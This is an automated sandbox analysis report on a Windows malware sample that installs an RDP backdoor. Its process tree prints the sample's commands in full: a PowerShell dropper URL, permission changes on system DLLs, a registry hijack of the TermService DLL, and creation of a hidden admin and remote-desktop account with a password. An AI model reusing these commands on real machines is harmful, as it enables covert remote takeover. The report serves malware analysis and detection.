eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2

Analysis

max time kernel
131s
max time network
124s
platform
windows7_x64
resource
win7v20201028
submitted
09-11-2020 21:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Size

3.5MB
MD5

551466c49c45b71ee7b4d5a4fc0a800e
SHA1

be312273c1db869c5f23cc9ba24b31b66824a809
SHA256

eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2
SHA512

1f4de516895870a74444b560df538259137900d73b78970926d7bebd0e759976630273e21c8cd6921aec85d614d6d305071cccf5c217762665e5e91d24694e4a

Score

10^/10

discovery exploit persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
7	1332	powershell.exe
9	1332	powershell.exe
11	1332	powershell.exe
12	1332	powershell.exe
14	1332	powershell.exe
16	1332	powershell.exe
18	1332	powershell.exe
20	1332	powershell.exe
22	1332	powershell.exe
24	1332	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

1640 icacls.exe
1740 icacls.exe
1360 icacls.exe
1104 icacls.exe
1664 takeown.exe
1668 icacls.exe
1844 icacls.exe
348 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1640	icacls.exe
1740	icacls.exe
1360	icacls.exe
1104	icacls.exe
1664	takeown.exe
1668	icacls.exe
1844	icacls.exe
348	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1300 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

920
920
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1664 takeown.exe
1668 icacls.exe
1844 icacls.exe
348 icacls.exe
1640 icacls.exe
1740 icacls.exe
1360 icacls.exe
1104 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1300	powershell.exe

pid	process
920
920

pid	process
1664	takeown.exe
1668	icacls.exe
1844	icacls.exe
348	icacls.exe
1640	icacls.exe
1740	icacls.exe
1360	icacls.exe
1104	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 41 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b89a67b9-a1d2-441b-b091-fc4c72c733cc	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab61B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8B1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8E4.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab914.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YVGEUJ8F4FQOB8SOHVY.temp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab55E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab65B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar8D2.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_853bbd5d-b68d-48ef-87bf-8de50817dd1c	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9467568f-be88-49e8-aee1-12ed054c05a8	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_557f2bdc-7223-4bc4-a675-daed9c459a4f	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8E3.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e34d7a9e-8a76-4279-babe-2755e71e254f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a795cec-8d5f-4d97-9380-b62861a1a288	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b579aa51-24b8-4f1d-98f0-e5f386d98731	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar915.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar55F.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar61C.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8B0.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4a4941d-999c-4ac6-ab08-c3f7b0939742	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fdc397f2-6440-4171-adaf-145c73ae938b	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar65C.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_63fcdb2a-f6a1-4086-8d5f-39df79ec2181	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c3a95c74-743f-49cf-99c8-bdb70d2550ac	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab89E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar89F.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab8D1.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies data under HKEY_USERS 60 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80dc8a7e05b8d601	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

848 reg.exe
Runs net.exe

pid	process
848	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

1300 powershell.exe
1300 powershell.exe
1300 powershell.exe
1300 powershell.exe
1300 powershell.exe
1332 powershell.exe
1332 powershell.exe
Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

472
920
920
920
920

pid	process
1300	powershell.exe
1300	powershell.exe
1300	powershell.exe
1300	powershell.exe
1300	powershell.exe
1332	powershell.exe
1332	powershell.exe

pid	process
472
920
920
920
920

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeRestorePrivilege	1844	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1152	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1152	WMIC.exe
Token: SeAuditPrivilege	1152	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1152	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1152	WMIC.exe
Token: SeAuditPrivilege	1152	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1512	WMIC.exe
Token: SeAuditPrivilege	1512	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1512	WMIC.exe
Token: SeAuditPrivilege	1512	WMIC.exe
Token: SeDebugPrivilege	1332	powershell.exe

Suspicious use of WriteProcessMemory 133 IoCs

Processes:

eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exepowershell.execsc.exenet.execmd.execmd.exenet.exe

description	pid	process	target process
PID 684 wrote to memory of 1300	684	eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe	powershell.exe
PID 684 wrote to memory of 1300	684	eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe	powershell.exe
PID 684 wrote to memory of 1300	684	eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe	powershell.exe
PID 684 wrote to memory of 1300	684	eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe	powershell.exe
PID 1300 wrote to memory of 676	1300	powershell.exe	csc.exe
PID 1300 wrote to memory of 676	1300	powershell.exe	csc.exe
PID 1300 wrote to memory of 676	1300	powershell.exe	csc.exe
PID 676 wrote to memory of 860	676	csc.exe	cvtres.exe
PID 676 wrote to memory of 860	676	csc.exe	cvtres.exe
PID 676 wrote to memory of 860	676	csc.exe	cvtres.exe
PID 1300 wrote to memory of 1664	1300	powershell.exe	takeown.exe
PID 1300 wrote to memory of 1664	1300	powershell.exe	takeown.exe
PID 1300 wrote to memory of 1664	1300	powershell.exe	takeown.exe
PID 1300 wrote to memory of 1668	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1668	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1668	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1844	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1844	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1844	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 348	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 348	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 348	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1640	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1640	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1640	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1740	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1740	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1740	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1360	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1360	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1360	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1104	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1104	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 1104	1300	powershell.exe	icacls.exe
PID 1300 wrote to memory of 684	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 684	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 684	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 848	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 848	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 848	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 568	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 568	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 568	1300	powershell.exe	reg.exe
PID 1300 wrote to memory of 368	1300	powershell.exe	net.exe
PID 1300 wrote to memory of 368	1300	powershell.exe	net.exe
PID 1300 wrote to memory of 368	1300	powershell.exe	net.exe
PID 368 wrote to memory of 1620	368	net.exe	net1.exe
PID 368 wrote to memory of 1620	368	net.exe	net1.exe
PID 368 wrote to memory of 1620	368	net.exe	net1.exe
PID 1300 wrote to memory of 1908	1300	powershell.exe	cmd.exe
PID 1300 wrote to memory of 1908	1300	powershell.exe	cmd.exe
PID 1300 wrote to memory of 1908	1300	powershell.exe	cmd.exe
PID 1908 wrote to memory of 2036	1908	cmd.exe	cmd.exe
PID 1908 wrote to memory of 2036	1908	cmd.exe	cmd.exe
PID 1908 wrote to memory of 2036	1908	cmd.exe	cmd.exe
PID 2036 wrote to memory of 2016	2036	cmd.exe	net.exe
PID 2036 wrote to memory of 2016	2036	cmd.exe	net.exe
PID 2036 wrote to memory of 2016	2036	cmd.exe	net.exe
PID 2016 wrote to memory of 1504	2016	net.exe	net1.exe
PID 2016 wrote to memory of 1504	2016	net.exe	net1.exe
PID 2016 wrote to memory of 1504	2016	net.exe	net1.exe
PID 1300 wrote to memory of 1072	1300	powershell.exe	cmd.exe
PID 1300 wrote to memory of 1072	1300	powershell.exe	cmd.exe
PID 1300 wrote to memory of 1072	1300	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
"C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:684

\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7149.tmp" "c:\Users\Admin\AppData\Local\Temp\niy0jjqs\CSC2F104AD658C14F50B898825C301F8E4D.TMP"
4⤵
PID:860

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1664

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1668

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:348

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1640

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1740

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1360

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1104

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:684

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:848

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:568

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:1620

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1504

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:1072

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:628

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:1528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:372

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1748

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:1908

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:1332

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
PID:1664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:1668

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wHLGRkc2 /add
1⤵
PID:1848

C:\Windows\system32\net.exe
net.exe user wgautilacc wHLGRkc2 /add
2⤵
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc wHLGRkc2 /add
3⤵
PID:1640

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1064

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
PID:1104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
